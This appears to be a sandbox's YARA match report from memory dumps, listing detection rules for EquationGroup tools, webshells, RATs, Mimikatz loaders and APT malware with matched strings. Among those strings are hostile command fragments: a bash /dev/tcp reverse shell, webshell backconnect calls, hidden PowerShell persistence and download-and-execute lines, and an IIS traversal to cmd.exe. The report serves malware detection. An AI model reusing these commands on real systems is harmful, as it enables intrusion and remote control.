0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	EquationGroup_noclient_3_3_2	Equation Group hack tool set	Florian Roth	0x2a590:$x1: 127.0.0.1 is not advisable as a source. Use -l 127.0.0.1 to override this warning 0x2a5e6:$x2: iptables -%c OUTPUT -p tcp -d 127.0.0.1 --tcp-flags RST RST -j DROP; 0x2a62f:$x3: noclient: failed to execute %s: %s 0x2a656:$x4: sh -c "ping -c 2 %s; grep %s /proc/net/arp >/tmp/gx " 0x2a690:$s5: Attempting connection from 0.0.0.0:
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	EquationGroup_Toolset_Apr17_Eternalromance	Detects EquationGroup Tool - April Leak	Florian Roth	0x1e885:$x1: [-] Error: Exploit choice not supported for target OS!! 0x1e8c1:$x2: Error: Target machine out of NPP memory (VERY BAD!!) - Backdoor removed 0x1e90d:$x3: [-] Error: Backdoor not present on target 0x1e93b:$x4: ********* TARGET ARCHITECTURE IS X64 **********
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	EquationGroup_Toolset_Apr17_Gen2	Detects EquationGroup Tool - April Leak	Florian Roth	0x1ef09:$s1: [+] Setting password : (NULL) 0x1ef2b:$s2: [-] TbBuffCpy() failed! 0x1ef47:$s3: [+] SMB negotiation 0x1ef5f:$s4: 12345678-1234-ABCD-EF00-0123456789AB 0x1ef88:$s5: Value must end with 0000 (2 NULLs) 0x1efaf:$s6: [] Configuring Payload 0x1efcb:$s7: [] Connecting to listener 0x1efeb:$op1: B0 42 40 00 89 44 24 30 C7 44 24 34 0x1effd:$op2: EB 59 8B 4C 24 10 68 1C 46
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	EquationGroup_Toolset_Apr17_ntevt	Detects EquationGroup Tool - April Leak	Florian Roth	0x20329:$x1: c:\ntevt.pdb 0x2033a:$s1: ARASPVU 0x20347:$op1: 41 5A 41 59 41 58 5F 5E 5D 5A 59 5B 58 48 83 C4 0x23b10:$op1: 41 5A 41 59 41 58 5F 5E 5D 5A 59 5B 58 48 83 C4 0x2035d:$op2: F9 48 03 FA 48 33 C0 8A 01 49 03 C1 49 F7 E0 88 0x23b26:$op2: F9 48 03 FA 48 33 C0 8A 01 49 03 C1 49 F7 E0 88 0x20373:$op3: 01 41 F6 E0 49 03 C1 88 01 48 33 0x23b3c:$op3: 01 41 F6 E0 49 03 C1 88 01 48 33
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	EquationGroup_Toolset_Apr17_msgkd_msslu64_msgki_mssld	Detects EquationGroup Tool - April Leak	Florian Roth	0x27138:$s1: PQRAPAQSTUVWARASATAUAVAW 0x27155:$s2: SQRUWVAWAVAUATASARAQAP 0x27170:$s3: iijymqp 0x2717c:$s4: AWAVAUATASARAQI 0x27190:$s5: WARASATAUAVM 0x271a2:$op1: 0C 80 30 02 48 83 C2 01 49 83 E9 01 75 E1 C3 CC 0x271b8:$op2: E8 10 66 0D 00 80 66 31 02 48 83 C2 02 49 83 E9 0x271ce:$op3: 48 B8 53 A5 E1 41 D4 F1 07 00 48 33
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	EquationGroup_Toolset_Apr17__DoubleFeatureReader_DoubleFeatureReader_0	Detects EquationGroup Tool - April Leak	Florian Roth	0x27571:$x1: DFReader.exe logfile AESKey [-j] [-o outputfilename] 0x275aa:$x2: Double Feature Target Version 0x275cc:$x3: DoubleFeature Process ID 0x275ea:$op1: A1 30 21 41 00 89 85 D8 FC FF FF A1 34 21 41 00
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	EquationGroup_Toolset_Apr17__EAFU_ecwi_ESKE_EVFR_RPC2_4	Detects EquationGroup Tool - April Leak	Florian Roth	0x27b85:$x1: * Listening Post DLL %s() returned error code %d. 0x27bbb:$s1: WsaErrorTooManyProcesses 0x1e27e:$s2: NtErrorMoreProcessingRequired 0x27bd8:$s2: NtErrorMoreProcessingRequired 0x1bc81:$s3: Connection closed by remote host (TCP Ack/Fin) 0x27bfa:$s3: Connection closed by remote host (TCP Ack/Fin) 0x27c2d:$s4: ServerErrorBadNamePassword
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	EquationGroup_scanner_output	Detects output generated by EQGRP scanner.exe	Florian Roth	0x1b85d:$s0: # scanning ip 0x1fdf7:$s0: # scanning ip 0x1b871:$s1: # Scan for windows boxes 0x1b88e:$s2: Going into send 0x1b8a2:$s3: # Does not work 0x1b8b6:$s4: You are the weakest link, goodbye 0x1b8dc:$s5: rpc Scan for RPC folks
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	JoeSecurity_xtremerat_1	Yara detected Xtreme RAT	Joe Security
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	JoeSecurity_PupyRAT	Yara detected PupyRAT	Joe Security
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	dragos_crashoverride_moduleStrings	IEC-104 Interaction Module Program Strings	Dragos Inc	0x17942:$s1: IEC-104 client: ip=%s; port=%s; ASDU=%u 0x17933:$s5: iec104.log
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	Obfuscated_VBS_April17	Detects cloaked Mimikatz in VBS obfuscation	Florian Roth	0x1b546:$s1: ::::::ExecuteGlobal unescape(unescape(
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp	Obfuscated_JS_April17	Detects cloaked Mimikatz in JS obfuscation	Florian Roth	0x1b6de:$s1: ";function Main(){for(var 0x1b6fd:$s2: =String.fromCharCode(parseInt( 0x1b720:$s3: ));(new Function(
0000000A.00000003.324570617.0000000006668000.00000004.00000001.sdmp	Hacktool_Strings_p0wnedShell	p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs	Florian Roth	0x4558:$x5: p0wnedShellx64
0000000A.00000003.323986177.0000000002E7D000.00000004.00000001.sdmp	scanarator	Auto-generated rule on file scanarator.exe	yarGen Yara Rule Generator by Florian Roth	0x1f78:$s4: GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
0000000A.00000003.323415245.0000000006628000.00000004.00000001.sdmp	webshell_webshells_new_PHP1	Web shells - generated from file PHP1.php	Florian Roth	0x430:$s3: @preg_replace("/f/e",$_GET['u'],"fengjiao");
0000000A.00000003.323415245.0000000006628000.00000004.00000001.sdmp	h4ntu_shell__powered_by_tsoi_	Semi-Auto-generated - file h4ntu shell [powered by tsoi	unknown	0x249:$s0: h4ntu shell
0000000A.00000003.313108656.0000000006641000.00000004.00000001.sdmp	FVEY_ShadowBroker_Auct_Dez16_Strings	String from the ShodowBroker Files Screenshots - Dec 2016	Florian Roth	0x999e:$s2: Auditcleaner 0x7ece:$elf12: envoytomato 0x7f2e:$elf14: estopmoonlit
00000013.00000003.458084749.0000000006D9C000.00000004.00000001.sdmp	shankar_php_php	Semi-Auto-generated - file shankar.php.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x35b6:$sAuthor: ShAnKaR
00000013.00000003.438854953.0000000006BFE000.00000004.00000001.sdmp	multiple_webshells_0015	Semi-Auto-generated - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x215:$s1: $_POST['backconnectip']
00000013.00000003.438854953.0000000006BFE000.00000004.00000001.sdmp	Webshell_27_9_acid_c99_locus7s	Detects Webshell - rule generated from from files 27.9.txt, acid.php, c99_locus7s.txt	Florian Roth	0x1f8:$s0: $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
00000013.00000003.443343261.0000000006BFE000.00000004.00000001.sdmp	multiple_webshells_0015	Semi-Auto-generated - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x215:$s1: $_POST['backconnectip']
00000013.00000003.443343261.0000000006BFE000.00000004.00000001.sdmp	Webshell_27_9_acid_c99_locus7s	Detects Webshell - rule generated from from files 27.9.txt, acid.php, c99_locus7s.txt	Florian Roth	0x1f8:$s0: $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
00000013.00000002.524614024.000000000242B000.00000004.00000001.sdmp	Amplia_Security_Tool	Amplia Security Tool	unknown	0x13a087:$a: Amplia Security 0x13a1ff:$a: Amplia Security 0x13a21d:$c: getlsasrvaddr.exe 0x13a23d:$d: Cannot get PID of LSASS.EXE 0x13a267:$e: extract the TGT session key 0x13a291:$f: PPWDUMP_DATA
00000013.00000002.524614024.000000000242B000.00000004.00000001.sdmp	scanarator	Auto-generated rule on file scanarator.exe	yarGen Yara Rule Generator by Florian Roth	0x139fbb:$s4: GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
00000013.00000003.470647242.0000000006B9B000.00000004.00000001.sdmp	webshell_PHP_b37	Web Shell - file b37.php	Florian Roth	0x220:$s0: xmg2/G4MZ7KpNveRaLgOJvBcqa2A8/sKWp9W93NLXpTTUgRc
00000013.00000003.428675269.0000000006B79000.00000004.00000001.sdmp	webshell_PHP_b37	Web Shell - file b37.php	Florian Roth	0x22220:$s0: xmg2/G4MZ7KpNveRaLgOJvBcqa2A8/sKWp9W93NLXpTTUgRc
00000013.00000003.428675269.0000000006B79000.00000004.00000001.sdmp	Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php	Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x191db:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
0000000A.00000002.552309239.00000000036C7000.00000004.00000001.sdmp	Amplia_Security_Tool	Amplia Security Tool	unknown	0x32bc:$a: Amplia Security 0x38ac:$a: Amplia Security
0000000A.00000003.310922017.00000000050BA000.00000004.00000001.sdmp	Amplia_Security_Tool	Amplia Security Tool	unknown	0x79d0:$a: Amplia Security
0000000A.00000003.310922017.00000000050BA000.00000004.00000001.sdmp	webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat	Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php	Florian Roth	0x7bf8:$s8: if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } 0x7d38:$s9: foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
0000000A.00000003.310922017.00000000050BA000.00000004.00000001.sdmp	Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php	Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x7e79:$s0: Safe0ver
0000000A.00000003.325437911.0000000006654000.00000004.00000001.sdmp	Empire_Invoke_Shellcode	Empire - a pure PowerShell post-exploitation agent - file Invoke-Shellcode.ps1	Florian Roth	0x308:$s2: "Injecting shellcode injecting into $((Get-Process -Id $ProcessId).ProcessName) ($ProcessId)!" ) )
0000000A.00000003.325437911.0000000006654000.00000004.00000001.sdmp	Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php	Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x48b:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
0000000A.00000003.322843197.000000000684B000.00000004.00000001.sdmp	webshell_jsp_cmdjsp	Web Shell - file cmdjsp.jsp	Florian Roth	0xd88:$s5: <FORM METHOD=GET ACTION='cmdjsp.jsp'>
0000000A.00000003.322843197.000000000684B000.00000004.00000001.sdmp	webshell_sig_404super	Web shells - generated from file 404super.php	Florian Roth	0xc08:$s4: $i = pack('c*', 0x70, 0x61, 99, 107);
0000000A.00000003.322843197.000000000684B000.00000004.00000001.sdmp	webshell_webshells_new_Asp	Web shells - generated from file Asp.asp	Florian Roth	0xdc8:$s1: Execute MorfiCoder(")//z//(tseuqer lave")
00000013.00000003.485624536.0000000006BFE000.00000004.00000001.sdmp	multiple_webshells_0015	Semi-Auto-generated - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x215:$s1: $_POST['backconnectip']
00000013.00000003.485624536.0000000006BFE000.00000004.00000001.sdmp	Webshell_27_9_acid_c99_locus7s	Detects Webshell - rule generated from from files 27.9.txt, acid.php, c99_locus7s.txt	Florian Roth	0x1f8:$s0: $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
00000013.00000003.458213135.0000000006DE1000.00000004.00000001.sdmp	Amplia_Security_Tool	Amplia Security Tool	unknown	0x4caf0:$c: getlsasrvaddr.exe 0x50420:$e: extract the TGT session key
00000013.00000003.458213135.0000000006DE1000.00000004.00000001.sdmp	SQLMap	This signature detects the SQLMap SQL injection tool	Florian Roth	0x5e6f0:$s1: except SqlmapBaseException, ex:
00000013.00000003.458213135.0000000006DE1000.00000004.00000001.sdmp	PortRacer	Auto-generated rule on file PortRacer.exe	yarGen Yara Rule Generator by Florian Roth	0x50090:$s0: Auto Scroll BOTH Text Boxes 0x504e0:$s4: Start/Stop Portscanning 0x5e6b8:$s6: Auto Save LogFile by pressing STOP
00000013.00000003.422640827.00000000051E4000.00000004.00000001.sdmp	Amplia_Security_Tool	Amplia Security Tool	unknown	0xf580:$a: Amplia Security
00000013.00000003.422640827.00000000051E4000.00000004.00000001.sdmp	Fierce2	This signature detects the Fierce2 domain scanner	Florian Roth	0xf398:$s1: $tt_xml->process( 'end_domainscan.tt', $end_domainscan_vars,
00000013.00000003.422640827.00000000051E4000.00000004.00000001.sdmp	webshell_Shell_ci_Biz_was_here_c100_v_xxx	Web Shell - from files Shell [ci	unknown	0xf758:$s3: <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null" 0xf1b8:$s7: <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/de
00000013.00000003.422640827.00000000051E4000.00000004.00000001.sdmp	Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php	Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0xf439:$s0: Safe0ver
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp	Volgmer_Malware	Detects Volgmer malware as reported in US CERT TA17-318B	Florian Roth	0x22fc2:$x1: User-Agent: Mozillar/5.0 0x23002:$x3: [TestConnect To Bot] - Port = %d 0x23027:$x4: b50a338264226b6d57c1936d9db140ba74a28930270a083353645a9b518661f4fcea160d7 0x2308a:$s2: H_%s_%016I64X_%04d%02d%02d%02d%02d%02d.TXT 0x230d5:$s4: %s\dllcache\%s.dll 0x230ec:$s5: Cond Fail. 0x230fb:$s6: The %s %s%s 0x2310b:$s7: %s "%s"%s "%s" %s "%s" 0x23126:$s8: DLL_Spider.dll
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp	RemCom_RemoteCommandExecution	Detects strings from RemCom tool	Florian Roth	0x1ee2c:$: \\.\pipe\%s%s%d 0x1ee3e:$: %s\pipe\%s%s%d%s 0x1ee51:$: \ADMIN$\System32\%s%s
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp	ProcessInjector_Gen	Detects a process injection utility that can be used ofr good and bad purposes	Florian Roth	0x10fd0:$x1: Error injecting remote thread in process: 0x10ffe:$s5: [-] Error getting access to process: %ld! 0x1102c:$s6: --process-name <name> Process name to inject 0x1105f:$s12: No injection target has been provided! 0x1108b:$s17: [-] An app path is required when not injecting!
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp	Lazagne_PW_Dumper	Detects Lazagne PW Dumper	Markus Neis / Florian Roth	0x13510:$s1: Crypto.Hash 0x13520:$s2: laZagne 0x1352c:$s3: impacket.winregistry
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp	SUSP_shellpop_Bash	Detects susupicious bash command	Tobias Michalski	0xce91:$: /bin/bash -i >& /dev/tcp/
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp	GoldDragon_Aux_File	Detects export from Gold Dragon - February 2018	Florian Roth	0x1b5ff:$x1: /////////////////////regkeyenum//////////// 0x1b8ac:$x1: /////////////////////regkeyenum////////////
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp	VBS_dropper_script_Dec17_1	Detects a supicious VBS script that drops an executable	Florian Roth	0x1ec7d:$s1: TVpTAQEAAAAEAA 0x1ec90:$s2: TVoAAAAAAAAAAA 0x1eca3:$s3: TVqAAAEAAAAEAB 0x1ecb6:$s4: TVpQAAIAAAAEAA 0x1ecc9:$s5: TVqQAAMAAAAEAA 0x223c6:$s5: TVqQAAMAAAAEAA 0x24783:$s5: TVqQAAMAAAAEAA 0x1ecdc:$a1: = CreateObject("Wscript.Shell")
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp	Lazarus_Dec_17_5	Detects Lazarus malware from incident in Dec 2017	Florian Roth	0x20484:$x1: $ProID = Start-Process powershell.exe -PassThru -WindowStyle Hidden -ArgumentList 0x204da:$x2: $respTxt = HttpRequestFunc_doprocess -szURI $szFullURL -szMethod $szMethod -contentData $contentData; 0x20544:$x3: [String]$PS_PATH = "C:\\Users\\Public\\Documents\\ProxyAutoUpdate.ps1"; 0x20590:$x4: $cmdSchedule = 'schtasks /create /tn "ProxyServerUpdater" 0x205ce:$x5: /tr "powershell.exe -ep bypass -windowstyle hidden -file 0x2060c:$x6: C:\\Users\\Public\\Documents\\tmp' + -join 0x2063c:$x7: $cmdResult = cmd.exe /c $cmdInst \| Out-String; 0x2066f:$x8: whoami /groups \| findstr /c:"S-1-5-32-544"
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp	APT_Turla_Agent_BTZ_Gen_1	Detects Turla Agent.BTZ	Florian Roth	0xaa9a:$x1: 1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s 0x1182c:$x1: 1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s 0xab00:$s1: release mutex - %u (%u)(%u) 0xab20:$s2: \system32\win.com 0x119af:$s2: \system32\win.com 0xab36:$s3: Command Id:%u%010u(%02d:%02d:%02d %02d/%02d/%04d) 0xab6c:$s4: MakeFile Error(%d) copy file to temp file %s 0xab9d:$s5: %s%%s08x.tmp 0xabae:$s6: Run instruction: %d ID:%u%010u(%02d:%02d:%02d %02d/%02d/%04d) 0xabf0:$s7: Mutex_Log 0xabfe:$s8: %s\system32\winview.ocx 0xac49:$s10: Error: pos(%d) > CmdSize(%d) 0xac6b:$s11: \win.com 0xac79:$s12: Error(%d) run %s 0xac90:$s13: %02d.%02d.%04d Log begin: 0x11991:$s13: %02d.%02d.%04d Log begin:
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp	Suspicious_BAT_Strings	Detects a string also used in Netwire RAT auxilliary	Florian Roth	0x1ddc6:$s1: ping 192.0.2.2 -n 1
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp	Turla_Mal_Script_Jan18_1	Detects Turla malicious script	Florian Roth	0x1dfe1:$s1: .charCodeAt(i % 0x1dff6:$s2: {WScript.Quit();} 0x1e00c:$s3: .charAt(i)) << 10) \| 0x1e025:$s4: = WScript.Arguments;var 0x1e043:$s5: = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";var i;
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp	VBS_Obfuscated_Mal_Feb18_1	Detects malicious obfuscated VBS observed in February 2018	Florian Roth	0x191c2:$x1: A( Array( (1* 2^1 )+ 0x191db:$x2: .addcode(A( Array( 0x191f2:$x3: false:AA.send:Execute(AA.responsetext):end 0x19221:$x4: & A( Array( (1* 2^1 )+ 0x1923d:$s1: .SYSTEMTYPE:NEXT:IF (UCASE( 0x1925d:$s2: A = STR:next:end function 0x1927b:$s3: &WSCRIPT.SCRIPTFULLNAME&CHR
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp	LokiBot_Dropper_ScanCopyPDF_Feb18	Auto-generated rule - file Scan Copy.pdf.com	Florian Roth	0x186b5:$a1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB 0x188a1:$a1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB 0x18708:$s2: Unstalled2
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x186b5:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB 0x188a1:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x21763:$sa1: -enc 0x217a0:$sb2: -window hidden 0x204b3:$sb3: -WindowStyle Hidden 0x205ec:$sb3: -windowstyle hidden 0xcbcc:$sc1: -nop 0xcbd1:$se1: -ep bypass 0x205e1:$se1: -ep bypass 0x21756:$se2: -exec bypass 0x21793:$se2: -exec bypass 0x1ac36:$se3: -ExecutionPolicy Bypass 0x21756:$se4: -exec bypass 0x21793:$se4: -exec bypass
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp	Armitage_msfconsole	Detects Armitage component	Florian Roth	0x1fb30:$s1: \umeterpreter\u > 0x1fb46:$s3: ^meterpreter > 0x1fb5a:$s11: \umsf\u>
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp	Armitage_OSX	Detects Armitage component	Florian Roth	0x1fc7a:$x1: resources/covertvpn-injector.exe 0x1fca0:$s10: resources/browserpivot.x64.dll 0x1fcc4:$s17: resources/msfrpcd_new.bat
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp	Silence_malware_2	Detects malware sample mentioned in the Silence report on Securelist	Florian Roth	0x24c3a:$x1: \ScreenMonitorService\Release\smmsrv.pdb 0x24c67:$x2: \\.\pipe\{73F7975A-A4A2-4AB6-9121-AECAE68AABBB} 0x24c9b:$s1: My Sample Service: ServiceMain: SetServiceStatus returned error 0x24cdf:$s2: \mss.exe 0x24cec:$s3: \out.dat 0x24cf9:$s4: \mss.txt 0x24d06:$s5: Default monitor
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp	Invoke_Mimikatz	Detects Invoke-Mimikatz String	Florian Roth	0x24798:$x3: Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x1e52c:$s1: stratum+tcp:// 0x1e53f:$s2: "normalHashing": true,
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp	MAL_unspecified_Jan18_1	Detects unspecified malware sample	Florian Roth	0x1dd71:$s1: User-Agent: Mozilla/4.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko 0x1ddc6:$s2: ping 192.0.2.2 -n 1 -w %d >nul 2>&1 0x1ddee:$s3: [Log Started] - [%.2d/%.2d/%d %.2d:%.2d:%.2d] 0x1de20:$s4: start /b "" cmd /c del "%%~f0"&exit /b 0x1de4b:$s5: [%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d] 0x1de74:$s6: %s\%s.bat 0x1de82:$s7: DEL /s "%s" >nul 2>&1
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp	Invoke_PSImage	Detects a command to execute PowerShell from String	Florian Roth	0x207f2:$: IEX([System.Text.Encoding]::ASCII.GetString( 0x20821:$: System.Drawing.Bitmap((a Net.WebClient).OpenRead( 0x20855:$: 89 50 4E 47 0D 0A 1A 0A 00 00 00 0D 49 48 44 52 00 00 04 E4 00 00 03 A0 08 06 00 00 00 9D AF A9 ...
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp	malware_apt15_royaldll	DLL implant, originally rights.dll and runs as a service	David Cannings	0x1488f:$: Nwsapagent 0x1487a:$: "%s">>"%s"\s.txt 0x1483a:$: del c:\windows\temp\r.exe /f /q
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp	JoeSecurity_WebMonitor	Yara detected WebMonitor RAT	Joe Security
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp	JoeSecurity_MiniRAT	Yara detected Mini RAT	Joe Security
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp	JoeSecurity_ComRAT_XORKey	Yara detected Turla ComRAT XORKey	Joe Security
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp	netwire	detect netwire in memory	JPCERT/CC Incident Response Group	0x1ddc6:$ping: ping 192.0.2.2 0x1ddee:$log: [Log Started] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]
0000000A.00000003.312268650.0000000006667000.00000004.00000001.sdmp	Hacktool_Strings_p0wnedShell	p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs	Florian Roth	0x5558:$x5: p0wnedShellx64
0000000A.00000003.324870228.0000000006654000.00000004.00000001.sdmp	Empire_Invoke_Shellcode	Empire - a pure PowerShell post-exploitation agent - file Invoke-Shellcode.ps1	Florian Roth	0x308:$s2: "Injecting shellcode injecting into $((Get-Process -Id $ProcessId).ProcessName) ($ProcessId)!" ) )
0000000A.00000003.324870228.0000000006654000.00000004.00000001.sdmp	Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php	Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x48b:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
00000013.00000003.441709320.0000000006BFE000.00000004.00000001.sdmp	multiple_webshells_0015	Semi-Auto-generated - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x215:$s1: $_POST['backconnectip']
00000013.00000003.441709320.0000000006BFE000.00000004.00000001.sdmp	Webshell_27_9_acid_c99_locus7s	Detects Webshell - rule generated from from files 27.9.txt, acid.php, c99_locus7s.txt	Florian Roth	0x1f8:$s0: $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
00000013.00000003.481501193.0000000006DCE000.00000004.00000001.sdmp	Amplia_Security_Tool	Amplia Security Tool	unknown	0x2f90:$f: PPWDUMP_DATA
0000000A.00000003.324781029.00000000068E9000.00000004.00000001.sdmp	Amplia_Security_Tool	Amplia Security Tool	unknown	0x11d0:$a: Amplia Security 0x1180:$c: getlsasrvaddr.exe
00000013.00000003.473662008.0000000006B9B000.00000004.00000001.sdmp	webshell_PHP_b37	Web Shell - file b37.php	Florian Roth	0x220:$s0: xmg2/G4MZ7KpNveRaLgOJvBcqa2A8/sKWp9W93NLXpTTUgRc
00000013.00000003.481442342.0000000006D9C000.00000004.00000001.sdmp	shankar_php_php	Semi-Auto-generated - file shankar.php.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x35b6:$sAuthor: ShAnKaR
0000000A.00000003.325135478.0000000006854000.00000004.00000001.sdmp	shankar_php_php	Semi-Auto-generated - file shankar.php.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x926:$sAuthor: ShAnKaR
00000013.00000003.463235186.0000000006E38000.00000004.00000001.sdmp	SQLMap	This signature detects the SQLMap SQL injection tool	Florian Roth	0x76f0:$s1: except SqlmapBaseException, ex:
00000013.00000003.470663077.0000000006BA5000.00000004.00000001.sdmp	Hacktool_Strings_p0wnedShell	p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs	Florian Roth	0x8818:$x5: p0wnedShellx64
0000000A.00000003.324504797.0000000006892000.00000004.00000001.sdmp	Amplia_Security_Tool	Amplia Security Tool	unknown	0xb768:$f: PPWDUMP_DATA
0000000A.00000003.325168966.0000000006892000.00000004.00000001.sdmp	Amplia_Security_Tool	Amplia Security Tool	unknown	0xb768:$f: PPWDUMP_DATA
00000013.00000003.477379778.00000000051F3000.00000004.00000001.sdmp	Amplia_Security_Tool	Amplia Security Tool	unknown	0x580:$a: Amplia Security
00000013.00000003.477379778.00000000051F3000.00000004.00000001.sdmp	Fierce2	This signature detects the Fierce2 domain scanner	Florian Roth	0x398:$s1: $tt_xml->process( 'end_domainscan.tt', $end_domainscan_vars,
00000013.00000003.477379778.00000000051F3000.00000004.00000001.sdmp	webshell_Shell_ci_Biz_was_here_c100_v_xxx	Web Shell - from files Shell [ci	unknown	0x758:$s3: <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null" 0x1b8:$s7: <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/de
